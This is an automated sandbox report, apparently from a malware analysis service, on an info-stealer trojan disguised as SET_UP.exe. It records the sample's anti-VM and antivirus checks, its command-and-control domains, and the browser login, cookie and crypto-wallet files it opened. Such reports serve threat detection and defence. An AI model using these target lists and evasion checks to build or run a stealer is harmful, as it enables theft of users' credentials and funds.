              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_2_02DEF2F00_2_02DEF2F0
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_2_02DB42A00_2_02DB42A0
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_2_02DD7A4D0_2_02DD7A4D
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_2_02DCF2200_2_02DCF220
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_2_02DBE3EA0_2_02DBE3EA
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_2_02DD23E60_2_02DD23E6
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_2_02DE5BB80_2_02DE5BB8
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_2_02DC6B5C0_2_02DC6B5C
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_2_02DB73700_2_02DB7370
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_2_02DB38F00_2_02DB38F0
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_2_02DDD8F60_2_02DDD8F6
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_2_02DB88E00_2_02DB88E0
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_2_02DB58B00_2_02DB58B0
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_2_02DDA0A00_2_02DDA0A0
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_2_02DE88100_2_02DE8810
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_2_02DCD8200_2_02DCD820
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_2_02DDB9930_2_02DDB993
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_2_02DCA1A00_2_02DCA1A0
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_2_02DB91500_2_02DB9150
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_2_02DE09500_2_02DE0950
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_2_02DDE1520_2_02DDE152
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_2_02DC81180_2_02DC8118
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_2_02DB61100_2_02DB6110
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_2_02DCC90F0_2_02DCC90F
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_2_02DCE1000_2_02DCE100
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_2_02DCB6C30_2_02DCB6C3
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_2_02DB2EF00_2_02DB2EF0
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_2_02DDA6820_2_02DDA682
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_2_02DD8EA00_2_02DD8EA0
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_2_02DCBFD60_2_02DCBFD6
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_2_02DC07CF0_2_02DC07CF
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_2_02DEB7900_2_02DEB790
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_2_02DC6FBD0_2_02DC6FBD
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_2_02DC0F580_2_02DC0F58
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_2_02DBF7560_2_02DBF756
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_2_02DEEF700_2_02DEEF70
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_2_02DE27600_2_02DE2760
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_2_02DC8F100_2_02DC8F10
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_2_02DDAF3F0_2_02DDAF3F
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_2_02DCA4C00_2_02DCA4C0
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_2_02DD1C500_2_02DD1C50
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_2_02DEC4070_2_02DEC407
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_2_02DC7C2B0_2_02DC7C2B
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_2_02DE65D90_2_02DE65D9
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_2_02DB95E00_2_02DB95E0
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_2_02DE8DE00_2_02DE8DE0
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_2_02DC65A60_2_02DC65A6
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_2_02DCD5500_2_02DCD550
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_2_02DE054B0_2_02DE054B
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_2_02DE75200_2_02DE7520
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: String function: 02DC3830 appears 77 times
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: String function: 024E50A0 appears 33 times
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: String function: 024D9770 appears 72 times
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: String function: 02DB7F00 appears 78 times
              Source: SET_UP.exeStatic PE information: invalid certificate
              Source: SET_UP.exeStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
              Source: SET_UP.exeStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
              Source: SET_UP.exe, 00000000.00000003.1786540546.00000000030A0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameshfolder.dll~/ vs SET_UP.exe
              Source: SET_UP.exe, 00000000.00000000.1681608784.0000000000530000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameshfolder.dll~/ vs SET_UP.exe
              Source: SET_UP.exeBinary or memory string: OriginalFilenameshfolder.dll~/ vs SET_UP.exe
              Source: SET_UP.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
              Source: 00000000.00000002.4127854417.00000000024D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
              Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@1/0@2/2
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_2_024D0B03 CreateToolhelp32Snapshot,Thread32First,Wow64SuspendThread,CloseHandle,0_2_024D0B03
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_2_02DE7CA0 CoCreateInstance,SysAllocString,CoSetProxyBlanket,SysAllocString,SysAllocString,VariantInit,VariantClear,SysFreeString,GetVolumeInformationW,0_2_02DE7CA0
              Source: C:\Users\user\Desktop\SET_UP.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: SET_UP.exe, 00000000.00000003.1810418595.0000000003686000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1823378295.0000000003668000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
              Source: SET_UP.exeVirustotal: Detection: 16%
              Source: SET_UP.exeReversingLabs: Detection: 15%
              Source: SET_UP.exeString found in binary or memory: -Helper process exited with failure code: 0x%x
              Source: SET_UP.exeString found in binary or memory: -HelperRegisterTypeLibrary: StatusCode invalidU
              Source: SET_UP.exeString found in binary or memory: /LoadInf=
              Source: SET_UP.exeString found in binary or memory: /InstallOnThisVersion: Invalid MinVersion string
              Source: C:\Users\user\Desktop\SET_UP.exeFile read: C:\Users\user\Desktop\SET_UP.exeJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeSection loaded: msimg32.dllJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeSection loaded: webio.dllJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: SET_UP.exeStatic file information: File size 75933817 > 1048576
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_3_0074CF61 push 680074CFh; iretd 0_3_0074CF71
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_3_0074CF61 push 680074CFh; iretd 0_3_0074CF71
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_3_0074C35C push 1880009Ch; ret 0_3_0074C361
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_3_0074C35C push 1880009Ch; ret 0_3_0074C361
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_3_00752FD9 push ss; retf 0077h0_3_00752FDA
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_3_00752FD9 push ss; retf 0077h0_3_00752FDA
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_3_00752FB9 push ss; iretd 0_3_00752FC2
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_3_00752FB9 push ss; iretd 0_3_00752FC2
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_3_0074CF61 push 680074CFh; iretd 0_3_0074CF71
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_3_0074CF61 push 680074CFh; iretd 0_3_0074CF71
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_3_0074C35C push 1880009Ch; ret 0_3_0074C361
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_3_0074C35C push 1880009Ch; ret 0_3_0074C361
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_3_00752FD9 push ss; retf 0077h0_3_00752FDA
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_3_00752FD9 push ss; retf 0077h0_3_00752FDA
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_3_00752FB9 push ss; iretd 0_3_00752FC2
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_3_00752FB9 push ss; iretd 0_3_00752FC2
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_2_02500A42 push 1E00AF41h; retf 0_2_02500A48
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_2_0250CB80 push eax; mov dword ptr [esp], F7F4F5FAh0_2_0250CB8E
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_2_024F6857 push 75205B8Dh; ret 0_2_024F685C
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_2_0250F9F0 push eax; mov dword ptr [esp], 9AA5A4F7h0_2_0250F9F1
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_2_02DEB310 push eax; mov dword ptr [esp], F7F4F5FAh0_2_02DEB31E
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_2_02DDF1D2 push 1E00AF41h; retf 0_2_02DDF1D8
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_2_02DEE180 push eax; mov dword ptr [esp], 9AA5A4F7h0_2_02DEE181
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_2_02DD4FE7 push 75205B8Dh; ret 0_2_02DD4FEC
              Source: C:\Users\user\Desktop\SET_UP.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

              Malware Analysis System Evasion

              barindex
              Source: C:\Users\user\Desktop\SET_UP.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController
              Source: C:\Users\user\Desktop\SET_UP.exeSystem information queried: FirmwareTableInformationJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exe TID: 792Thread sleep time: -30000s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeKey opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\08070809Jump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeKey opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\04070809Jump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\PlaceholderTileLogoFolderJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\CommsJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\GoogleJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\CEFJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\PeerDistRepubJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\MicrosoftJump to behavior
              Source: SET_UP.exe, 00000000.00000002.4127024300.00000000006EC000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.2494026017.00000000006E7000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1852186136.00000000006E5000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1852680151.00000000006EC000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1809485265.00000000006E3000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.2089447837.00000000006E5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW1kbw
              Source: SET_UP.exe, 00000000.00000002.4126921023.00000000006BB000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1809485265.00000000006F0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: C:\Users\user\Desktop\SET_UP.exeProcess information queried: ProcessInformationJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_2_02DECAE0 LdrInitializeThunk,0_2_02DECAE0
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_2_024D03F3 mov edx, dword ptr fs:[00000030h]0_2_024D03F3
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_2_024D09B3 mov eax, dword ptr fs:[00000030h]0_2_024D09B3
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_2_024D1003 mov eax, dword ptr fs:[00000030h]0_2_024D1003
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_2_024D1002 mov eax, dword ptr fs:[00000030h]0_2_024D1002
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_2_024D0D63 mov eax, dword ptr fs:[00000030h]0_2_024D0D63

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Source: SET_UP.exeString found in binary or memory: noisycuttej.shop
              Source: SET_UP.exeString found in binary or memory: tirepublicerj.shop
              Source: SET_UP.exeString found in binary or memory: framekgirus.shop
              Source: SET_UP.exeString found in binary or memory: wholersorie.shop
              Source: SET_UP.exeString found in binary or memory: cloudewahsj.shop
              Source: SET_UP.exeString found in binary or memory: rabidcowse.shop
              Source: SET_UP.exeString found in binary or memory: abruptyopsn.shop
              Source: SET_UP.exeString found in binary or memory: nearycrepso.shop
              Source: SET_UP.exeString found in binary or memory: throwupset.click
              Source: C:\Users\user\Desktop\SET_UP.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

              Stealing of Sensitive Information

              barindex
              Source: Yara matchFile source: Process Memory Space: SET_UP.exe PID: 1104, type: MEMORYSTR
              Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
              Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
              Source: SET_UP.exe, 00000000.00000003.1852186136.000000000071F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\Electrum-LTC\wallets
              Source: SET_UP.exe, 00000000.00000003.1852186136.000000000071F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\ElectronCash\wallets
              Source: SET_UP.exeString found in binary or memory: %appdata%\com.liberty.jaxx\IndexedDB
              Source: SET_UP.exe, 00000000.00000003.1852186136.0000000000715000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: window-state.json
              Source: SET_UP.exe, 00000000.00000003.1852186136.000000000071F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\Exodus\exodus.wallet
              Source: SET_UP.exeString found in binary or memory: Wallets/Exodus
              Source: SET_UP.exe, 00000000.00000003.1852186136.0000000000715000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\Ethereum
              Source: SET_UP.exe, 00000000.00000003.1852186136.00000000006E5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
              Source: SET_UP.exeString found in binary or memory: keystore
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.dbJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifdJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqliteJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
